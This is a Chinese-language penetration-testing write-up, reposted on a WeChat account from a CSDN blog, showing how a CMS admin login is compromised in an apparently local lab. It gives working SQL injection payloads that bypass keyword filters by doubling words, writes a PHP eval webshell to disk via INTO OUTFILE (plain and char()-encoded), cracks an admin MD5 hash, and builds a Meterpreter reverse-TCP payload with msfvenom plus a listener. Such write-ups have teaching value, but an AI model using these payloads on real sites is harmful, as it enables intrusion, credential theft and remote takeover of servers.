现在只对常读和星标的公众号才展示大图推送,建议大家能把潇湘信安“设为星标”,否则可能看不到了...!
0x01 前言
0x02 渗透过程
2. 这里运气比较好,没有更改后台地址,还是默认地址/admin/login.php
3. 通过通用漏洞发先后台管理处存在sql注入漏洞,直接输入admin’,然后就会报错,这里用万能密码不能登陆,看来还是得通过上面得通用漏洞来进行注入
4. 可以看到输入payload后,页面返回正常,从而可以判断有sql注入,这里采用双写进行绕过
5. 发现这个注入点后,就有各种各样的注入方式了,通过sql语句写入一句话,sqlmap一把梭,手工注入得到账号密码等等,怎么方便怎么来,这里我把几种方法都写一下,看看那种方法可以
方法一
2. 一把梭,发现并没有,使用脚本也没有绕过
方法二
admin%27 un union ion selselectect 1,2,3,4,<?php @eval($_POST[123]);?> into outfile 'xm.php'#
2. 对shell部分进行编码
3. 写入shell的payload为:注意:记得在编码转换的时候前面加0x或者直接用unhex函数,但是本次实验用unhex函数一直失败,所以在前面加0x,看到可以写入成功。
ps:这里的写入路径纯属盲猜,运气好,默认目录
4. 用蚁剑连接,成功连接,至此getshell完毕,下来就是后渗透阶段,后面会讲
char函数绕过:mysql内置函数char()可以将里面的ascii码转换为字符串,payload为:
admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62) in into outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'#
一样成功写入
1. 写入成功后,菜刀可以连接,我们访问写入的文件,惊奇的发现竟然有admin,和一串md5码,大胆猜测可能是后台账号和密码,试一下
2. md5解密,wocao,成功登陆,然后就是后台找上传了
0x03 后渗透
方法一
payload:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe X > shell.exe
2.通过蚁剑上传木马,并执行。执行之前打开msf使用模块use exploit/multi/handler,设置相应参数,然后开始监听
方法二
0x04 一些其他的发现
0x05 总结
1. 前台sql注入获取用户名密码,进入后台找上传
2. SQL注入语句写入一句话
3. phpmyadmin一句话getshell
4. 上传大马提权
文章来源:CSDN博客(Deilty)
原文地址:https://blog.csdn.net/qq_42111373/article/details/105667190
关 注 有 礼
推 荐 阅 读